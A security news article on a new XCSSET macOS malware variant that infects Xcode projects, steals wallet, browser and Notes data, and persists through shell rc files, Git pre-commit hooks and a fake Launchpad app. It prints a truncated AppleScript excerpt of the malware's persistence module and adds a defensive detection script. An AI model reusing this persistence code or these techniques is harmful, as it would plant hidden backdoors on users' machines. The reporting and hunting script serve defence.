Microsoft Threat Intelligence has discovered a new variant of XCSSET, a sophisticated modular macOS malware that infects Xcode projects and executes when developers build these projects. This is the first known XCSSET variant since 2022, featuring enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies designed to steal sensitive information from macOS users.

Microsoft researchers noted that the infection chain consists of four stages, beginning with an obfuscated shell payload that runs when building an infected Xcode project. Following initial infection, the malware downloads additional modules from its command-and-control server (C2), including components that steal system information, browser extension data, digital wallet information, and notes from the Notes application. At the code level, the malware obfuscates module names to hinder static analysis and employs a randomized approach for generating payloads.

The malware utilizes three distinct persistence techniques, ensuring its payload launches whenever a new shell session begins, a user opens a fake Launchpad application, or a developer commits changes in Git. The report's excerpt of the module that writes the shell-persistence file reads as follows (the snippet is truncated in the source):

    on doMain()
        try
            if RESTORE_DEFAULT is true then
                -- cleanup path: remove the dropped aliases file
                do shell script "rm -f ~/.zshrc_aliases"
                log ".zshrc_aliases removed"
            else
                -- write the Terminal payload into ~/.zshrc_aliases
                set payload to getPayloadBody("Terminal")
                set payload to quoted form of payload
                do shell script "echo " & payload & " > ~/.zshrc_aliases"
                log ".zshrc_aliases updated"
                -- line that sources the aliases file from the shell rc (cut off in the source)
                set payload to "[ -f $HOME/.zshrc_aliases ] && . 

The malware also infects Git repositories by modifying pre-commit hooks to execute its payload whenever developers commit changes. Another persistence technique involves creating a fake Launchpad application that executes malicious code whenever a user attempts to open the legitimate Launchpad.

Microsoft recommends that users run the latest operating system versions, carefully inspect Xcode projects, and utilize security solutions like Microsoft Defender for Endpoint on Mac, which can detect and quarantine the malware variants.
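As an added defender-side example (not code from the report or from Microsoft), the following POSIX shell script hunts a macOS host for the three persistence artifacts described above: the ~/.zshrc_aliases drop and the rc file that sources it, live Git pre-commit hooks, and a Launchpad.app bundle outside the system location. The rc file names, the /System/Applications location of the genuine Launchpad and the default scan roots are assumptions about a typical macOS layout, not indicators from the report.

```shell
#!/bin/sh
# Added example (not code from the report): hunts a macOS host for the three
# XCSSET persistence artifacts described above. The rc file names and the
# /System/Applications location of the genuine Launchpad are assumptions.
# Each check prints one "ALERT:" line per finding and always returns 0.

# 1. Shell persistence: the dropped ~/.zshrc_aliases file, or an rc file
#    that sources it so the payload runs in every new shell session.
check_zsh_aliases() {
    [ -f "$1/.zshrc_aliases" ] &&
        echo "ALERT: $1/.zshrc_aliases present"
    for rc in "$1/.zshrc" "$1/.zprofile" "$1/.zshenv"; do
        [ -f "$rc" ] && grep -q 'zshrc_aliases' "$rc" &&
            echo "ALERT: $rc references .zshrc_aliases"
    done
    return 0
}

# 2. Git persistence: a live pre-commit hook. Git ignores the *.sample
#    files, so only a file named exactly "pre-commit" runs on commit.
check_git_hooks() {
    for root in "$@"; do
        find "$root" -type f -path '*/.git/hooks/*' -name pre-commit 2>/dev/null |
        while read -r hook; do
            echo "ALERT: active pre-commit hook at $hook"
        done
    done
    return 0
}

# 3. Fake Launchpad: a Launchpad.app bundle anywhere outside /System,
#    where the genuine one is assumed to live, is suspect.
check_fake_launchpad() {
    for root in "$@"; do
        find "$root" -type d -name Launchpad.app ! -path '/System/*' 2>/dev/null |
        while read -r app; do
            echo "ALERT: Launchpad.app outside /System at $app"
        done
    done
    return 0
}

scan_host() {
    check_zsh_aliases "$HOME"
    check_git_hooks "$HOME"
    check_fake_launchpad "$HOME/Applications" /Applications
}

# Scan the live system only when asked explicitly: sh xcsset_hunt.sh --scan
if [ "${1:-}" = "--scan" ]; then scan_host; fi
```

Every hit is a lead for manual review, not a verdict: inspect the hook or rc file contents before acting, since legitimate dotfile managers and repository tooling also create these files.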
This Cyber News was published on cybersecuritynews.com. Publication date: Wed, 12 Mar 2025 07:45:20 +0000